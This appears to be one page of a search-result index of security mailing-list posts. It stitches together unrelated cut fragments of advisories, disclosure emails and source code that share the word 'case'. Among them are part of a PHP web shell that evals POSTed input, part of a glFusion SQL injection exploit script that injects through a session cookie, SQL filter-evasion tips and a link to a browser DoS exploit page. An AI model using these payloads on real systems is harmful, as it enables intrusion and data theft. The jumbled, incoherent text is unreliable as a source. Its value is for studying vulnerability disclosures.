Next Page >>
case
void display_redraw(void)
{
switch(DisplayMode) {
...
case DisplaySplit: /* BL */
split_redraw();
break;
...
}
}
leading
to a local file inclusion attack.
Note: Omitting '.php' extension (to include arbitrary file like /etc/
passwd)
by using a NULL character will not be possible in this case as a
combination of %00 in the REQUEST_URI will not get decoded by the web
server
automatically and there is no urldecode function to decode it before the
require_once call either.
****
#################################################
if(isset($_GET['t'])) {
switch($_GET['t']) {
case "forum":
include("../admin/lang/".$lang."/reports/ops/forum.php");
break;
case "download":
include("../admin/lang/".$lang."/reports/ops/download.php");
$winda=strpos(strtolower(php_uname()),'wind');
define('format',50);
$pages='<center>###<a href=\''.basename(__FILE__).'\'>Created by Cr@zy_King</a>###</center>'.($winda===false?'id :'.`id`:'');
switch($page)
{
case 'eval':
{
$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
$eval_value=magic_q($eval_value);
$action=isset($_POST['action'])?$_POST['action']:'eval';
if($action=='eval_in_html') @eval($eval_value);
}
q++;
n = 0;
while (q > buf && memchr(itoa64, *--q, 64)) n++;
switch (n) {
case 22:
/* MD5-based */
if (q < buf + (1+1+1+3+1+1-1)) continue;
if (*q != '$') continue;
n = 0;
while (q > buf && memchr(itoa64, *--q, 64)) n++;
- -----/
8.2. *Memory Corruption related to Graphic Description [MSRC case 9562]*
Core Security Technologies reported a second bug in Excel which resulted
non exploitable. In its investigation, MSRC has analyzed BIFF5++, BIFF4,
and BIFF2 file formats for exploitability of this vulnerability. MSRC
has been unable to reproduce it in such a way that an exploitable
#endif
}
Ok. So if we pass negative value to gmalloc() than xpdf finish work via exit() call
and print to stderr "Invalid memory allocation size\n". If we pass 0 (zero) value
than function return NULL. In other cases there will be normal call to malloc() func.
Ok so let's look further.
"./splash/Splash.cc"
SplashError Splash::drawImage(SplashImageSource src, void *srcData,
$file_ext = substr ($file_name, (strlen($file_name)-3), 3);
$file_ext = strtolower($file_ext);
switch($file_ext)
{
case 'gif':
$ext = 'gif';
break;
case 'jpg':
$ext = 'jpg';
break;
-[ Buffer [6]
To fill the buffer, it does not need to be static data, so ENG uses random
data to fill the entire buffer, using a very, very simple technique that any
student is able to apply while learning C programming language:
1. Check the length of buffer to overflow: in this case it is 96
bytes;
2. Make a choice: lower case or mixed case;
3. Use randomized data to fill it up: lower case (0x41 to 0x5a) and
(0x41 to 0x5a for odds and 0x61 to 0x7a for evens)
value = 0; /* we have no value to print now */
/* Flags */
while (1) {
switch (*++fmt) {
case '=': /* fill character */
pad_char = *++fmt;
if (pad_char == '\0')
goto format_error;
continue;
case '^': /* not group currency */
. 2010-04-16:
Initial notification to the vendor. Draft advisory and proof-of-concept
files sent to MSRC. Publication date set for May 10, 2010.
. 2010-04-19:
MSRC responds that case 9975cw has been opened.
. 2010-04-27:
New case manager assigned by MSRC to handle the case. The issue is still
being investigated.
app you guys just deface the site or throw up drive-by attacks. So I figured, persistent XSS on the
front page is equally as valuable, especially with yet another IE 0-day in the wild. The chain is within
the application its self. Process sand-boxing like chroot/AppArmor/SELinux/Application-V(MS)
doesn't come into play. It works regardless of the operating system or configurations (Suhosin,
safemode, magic_quotes_gpc and register_globals doesn't come into play). I focused on the
application's internal configurations that could break the exploitation process. In this case seo friendly
urls and requiring an account before posting.
"This web application [OpenClassifieds] is developed to be fast, light, secure and SEO friendly."
Usually when I see that an application claims to be secure, they really don't know what the fuck they
are doing. OpenClassifieds' Security model is deeply flawed and as a result there are MANY
------------------------------------------------------------------------
While doing a quick sweep over the code base of FreeWebshop.org (FWS)
several vulnerabilities have been found in FWS. These vulnerabilities
allow attackers to obtain arbitrary information from the webserver and
database. It is even possible to execute arbitrary code with the
privileges of FWS. In some cases it may even be possible to fully
compromise the system on which FWS is installed. Most of these issues
are related to the fact that FWS fully trusts the content of the cookies
that it receives. These issues were discovered within a very small
time frame, it is likely that more issues exist within FWS. A full
security review of the code base is recommended to increase the security
...
3404 P_OP op = receive->p_operation;
3405 switch (op)
3406 {
3407 case op_connect:
...
3426 case op_compile:
...
3430 case op_attach:
...
"vulnerabilities" rather more of "annoyances". Although I don't deny the
fact that certain DoS attacks *may lead* or *may serve as hints* to other
more serious exploits, but that's a different topic and with ASLR in the
scene, a very grey area of discussion.
Case in point: XSS can be of various kinds and most of them (I'm talking of
about 99.99%) can be attributed to the design of the web
technologies/protocols specifications (http, ajax, etc etc...you name it)
and the browsers can only do that much. Hence its not feasible for a
webbrowser to 'prevent' them without tampering the protocol or annoying you
with continuous messages about what it is doing (assuming all users have the
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
PR07-31: Unauthenticated SQL Injection, XSS and Username Enumeration on
DPSnet Case Progress
Vulnerabilities Found: 23 May 2007
Vendor Contacted: 10 July 2007, 31 August 2007, 17 September 2007, 12
December 2007
Hello Susan!
As I already wrote you and Adam earlier, every type of disclosure (including
full disclosure and responsible full disclosure) can be good in appropriate
situation. And I use that type of disclosure which is suitable for every
particular case.
Taking into account that 3 from 4 vendors answered me (except Microsoft) and
Google had already non affected Chrome 4, and Mozilla and Opera promised to
fix it (we'll see when and how they do it), then you can see that my
approach works. And responsible full disclosure can force browser vendors to
> This will ONLY work if FireFox does NOT know which program to use.
It's interesting, because as I understand from your first information that
if works in Firefox (via Chrome) and from your previous text ("that FireFox
knows exists on the target operating system"), it must work if Firefox does
KNOW about which program to use. But in your case DoS effect is better when
Firefox does not know about program, then if it does know.
> (I'll post it on my own website anyway, giving you credit too of course.)
Thanks. I'm glad that my blocking DoS and DoS via resources consumption
print("[?] Vulnerable!\n");
} else {
die ("[?] Not vulnerable ...");
}
$sessid = login();
$sql = " AND (CASE WHEN (SELECT 1) THEN 1 ELSE 0 END) ) LIMIT 1-- ";
$cookies = "glf_session=$sessid".$sql."; glfusion=9999999999;";
$_o = _s($url, $cookies, 0, "");
if (chk_err($_o)) {
die("[!] MySQL < 4.1!\n");
} else {
filters are inefficient, see COM_applyFilter() which calls COM_applyBasicFilter()
in /public/lib-common.php near line 5774.
We are in an ORDER clause and vars are not surrounded by quotes,
bad chars are ex. "," , "/" ,"'", ";", "\",""","*","`"
but what about spaces and "("... you can use a CASE WHEN .. THEN .. ELSE .. END
construct instead of ex. IF(..,..,..) and "--" instead of "/*" to close
your query.
And ex. the alternative syntax SUBSTR(str FROM n FOR n) instead of
SUBSTR(str,n,n) in a sub-SELECT statement.
Other attacks are possible, COM_applyFilter() is a very common used one.
DoS of the browser is already bad thing. And there are many risks for users
from DoS holes in browsers, which I wrote about in 2008 in my articles
Dangers of DoS attacks on browsers and Dangers of resources consumption DoS
attacks. But mostly browser developers ignore to fix these issues.
But in this case it's not only attack on browsers, but on the whole user's
computer - because it's blocking of whole computer and full resource
consumption. Which is working in many browsers, including their last
versions. So browser developers with their neglect to this problem make
possible attacks on the whole users' systems. It was one of leitmotifs of my
advisory.
> from DoS holes in browsers, which I wrote about in 2008 in my articles
> Dangers of DoS attacks on browsers and Dangers of resources
> consumption DoS
> attacks. But mostly browser developers ignore to fix these issues.
>
> But in this case it's not only attack on browsers, but on the whole
> user's
> computer - because it's blocking of whole computer and full resource
> consumption. Which is working in many browsers, including their last
> versions. So browser developers with their neglect to this problem make
> possible attacks on the whole users' systems. It was one of leitmotifs
$in = $notin?' NOT IN ':' IN ';
$concat = $notin?' AND ':' OR ';
$glue = $string?"','":',';
switch($DB['TYPE']) {
case 'SQLITE3':
case 'MYSQL':
case 'POSTGRESQL':
case 'ORACLE':
default:
$items = array_chunk($array, 950);
8.2. *Second Proof-of-Concept*
By generating a second malformed .MBM file (available at [2]), we can
trigger a heap overflow that may lead to arbitrary code execution. In
this case, the crash occurs in the following code:
/-----
77F937A5 8901 MOV DWORD PTR DS:[ECX],EAX
77F937A7 8948 04 MOV DWORD PTR DS:[EAX+4],ECX
77F937AA 3BC1 CMP EAX,ECX
> >> understand, how the original reporter managed to gain access to the file in the
> >> restricted directory using that symlink.
> >
> > The perms are definitely broken and without a code audit on procfs I
> > would not bet that this is limited just to this rather obscure test
> > case.
> >
> > To be honest, I hope that it is limited to this rather obscure test
> > case. If it is not there may be entertaining ramifications.
> >
> Given my citation above (I personally use Linux), that obscure test case looks
Hello MustLive,
Thanks for your immediate reply.
I have now tested what you said, cause I suspected that it was only happening because Google Chrome was installed, due to FireFox isn't able to know what ``chromehtml:´´ is on its own. (it has to be associated with an application in this case).
The following would open a lot of windows, consuming most likely all ressources:
http://websecurity.com.ua/uploads/2009/Google%20Chrome%20DoS%20Exploit2.html
FireFox version: FireFox 3.5.2 (Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
8.2.1. *Vulnerable function*
We believe the vulnerable function to be face_array_read(), starting at
line 238 in file src/lib3ds_mesh.c of lib3ds. The vulnerable code is
executed in case CHK_MSH_MAT_GROUP of the following switch statement:
/-----
[Function:src/lib3ds_mesh.c:face_array_read()]
switch (chunk) {
Insufficient domain name validation
------------------------------------------------------------------------
Once the ActiveX control is installed, attackers might utilize this
control to install malicious software. To prevent this from happening,
getPlus verifies the URL before downloading and installing software from
this URL. In case of Adobe's version of getPlus, getPlus validates
if the domain name in the URL ends with .adobe.com. If this is not the
case getPlus shows a warning message and will refuse to download the
file from the supplied URL.
http://www.akitasecurity.nl/advisory/AK20090401/001_getplus_URL_not_allowed.png
connected to an untrusted Internet site are those specified by the
security policies of the Internet Zone at the Medium-High security level.
There are some issues in the way IE enforces zone security policies when
an URI is specified in the UNC form (i.e.,
'\\MACHINE_NAME_OR_IP\PATH_TO_RESOURCE'). In this case, Internet
Explorer classifies as *Internet Zone* any UNC address pointing to an IP
address including '127.0.0.1'. As a result, any website (belonging to
any security zone) can address and redirect the navigation flow to files
stored in '\\127.0.0.1'.
{
u_int64_t val;
val = 0;
switch (e->e_ident[EI_CLASS]) {
case ELFCLASS32:
base = (char *)base + elf32_offsets[member];
switch (e->e_ident[EI_DATA]) {
case ELFDATA2MSB:
val = be32dec(base);
break;
Next Page>>
|
